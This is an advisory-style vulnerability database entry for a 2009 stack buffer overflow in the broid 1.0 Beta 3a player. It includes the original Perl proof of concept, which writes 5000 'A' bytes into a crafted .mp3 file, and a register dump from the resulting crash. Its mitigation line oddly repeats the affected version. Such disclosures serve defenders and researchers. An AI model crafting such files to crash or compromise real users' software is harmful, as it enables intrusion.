Vendor: broid
By: HACK4LOVE
CVSS: 9.3 (HIGH)
Stack Overflow
CWE: 119
Product Name: broid
Affected Version From: 1.0 Beta 3a
Affected Version To: 1.0 Beta 3a
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

broid 1.0 Beta 3a (.mp3 File) Local Stack Overflow PoC

A stack-based buffer overflow vulnerability exists in broid 1.0 Beta 3a when handling .mp3 files. It is caused by a lack of proper bounds checking on the file's contents. An attacker who entices a victim to open a specially crafted .mp3 file can exploit it to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of broid 1.0 Beta 3a or later.

Exploit-DB raw data:

#!/usr/bin/perl
# Found By :: HACK4LOVE
# broid 1.0 Beta 3a (.mp3 File) Local Stack Overflow PoC
# http://s1.freedownloadsplace.com/download-soft1/broid-1.0-Beta-3a.zip
########################################################################################
##EAX 8C8C8C7D
##ECX 41414141
##EDX C3C3C3C3
##EBX 00FE28B8 ASCII "C:\Documents and Settings\ahmed\Desktop\hack4love.mp3"
##ESP 0012EF74
##EBP 00FFE128
##ESI 00001388
##EDI 41414141
##EIP 004784FF broidegn.004784FF
#######################################################################################
#Thanks*SimO-s0fT /\RAYO/\deco017/\mo7areb/\ELNAMER ELMASRY/\EL7ADRANY/\SKULL-HACKER
# Stack/\His0k4/\ThE g0bL!N/\ZAX/\ASER ELRO7/\SAR7ABEL ELSAFA7
########################################################################################
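# 5000 bytes of 0x41 ("A"): the filler seen in ECX and EDI in the register dump above
my $crash = "\x41" x 5000;
# Three-argument open with a lexical filehandle; append mode kept from the original
open(my $fh, '>>', 'hack4love.mp3') or die "Cannot open hack4love.mp3: $!";
print $fh $crash;
close($fh) or die "Cannot close hack4love.mp3: $!";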
########################################################################################

# milw0rm.com [2009-08-18]